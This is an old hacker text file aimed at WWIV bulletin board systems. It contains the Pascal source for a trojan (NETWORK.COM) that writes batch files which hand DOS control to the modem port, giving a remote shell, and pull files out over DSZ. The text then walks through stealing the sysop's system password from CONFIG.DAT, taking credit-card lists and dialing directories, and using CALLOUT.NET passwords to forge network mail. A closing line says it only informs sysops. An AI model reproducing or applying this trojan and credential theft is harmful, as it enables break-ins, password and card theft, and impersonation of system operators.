HACK.BAT
DEL NETWORK.COM
CTTY COM1
COMMAND
DLZ.BAT
CLS
CTTY CON
DSZ port1 speed2400 sz %1
CTTY COM1
CLS
After NETWORK.COM has created these two files, it will run
HACK.BAT which will turn control over to COM 1 and shell to dos!
Now that you are in DOS, there are a few things that you must
immediately do.
DLZ
where is the name of the file. For example,
DLZ CONFIG.DAT
will leech the configuration file.
/ Private G-Files from the G-File section Good for --< Lists of credit-card or calling-card numbers blackmail \ Pirate files --> His dialing directories from Telemate or Telix; these usually contain passwords and numbers of private BBS's!
b) In the target's net logs, he'll probably see a >NO NET<, which is rather common.
c) Very close to the beginning of CONFIG.DAT and right before the first directory entry (usually "MSGS\") you will find the target's SYSTEM PASSWORD. This is needed if you are going to log on as him or a remote sysop.
d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen OR the logs.
e) A few commands that you will want to try out when you are online as #1 are:
//DOS
//UEDIT
//BOARDEDIT
//DIREDIT
//GFILEEDIT
//CHUSER
Most require the system password, but if you're online as the
sysop you already have that.
f) You can have great fun with planted and rouge mailing if you have a copy of WWIV and the victim's CALLOUT.NET. CALLOUT.NET has a little note after every entry that looks something like:
"KAOIYQIGNADFUKG"
Or another random password. Read WWIVTECH.DOC (available on most WWIV boards) for more information. You should be able to pick up/drop off mail supposedly from and to your target very easily for about a week. When you start getting >BAD PASSWORD<, get back into your victim's DOS and get the passwords again!
g) You should be able to figure out what to do with the password file.
h) NEVER, NEVER, NEVER press backspace when there is nothing to backspace! This will have catastophic effects and will definintely crash CTTY!
i) This file is provided to inform WWIV sysops of this threat. If somebody uses it for "bad" purposes, it is not my fault.
{$M 8192,0,0} (* Leave memory for child process *)
uses Dos;
VAR
diskfile :text;
begin
assign (diskfile,'hack.bat'); (* Creates: *)
rewrite (diskfile); (* HACK.BAT *)
writeln (diskfile,'DEL NETWORK.COM');
writeln (diskfile,'CTTY COM1'); (* Change port here *)
writeln (diskfile,'COMMAND');
close (diskfile);
assign (diskfile,'dlz.bat'); (* Creates *)
rewrite (diskfile); (* DLZ.BAT *)
writeln (diskfile,'CLS');
writeln (diskfile,'CTTY CON');
writeln (diskfile,'DSZ port1 speed2400 sz %1'); (* change port *)
writeln (diskfile,'CTTY COM1');
writeln (diskfile,'CLS');
close (diskfile);
SwapVectors; (*****************)
Exec (GetEnv('COMSPEC'), '/C hack.bat'); (* runs HACK.BAT *)
SwapVectors; (*****************)
end.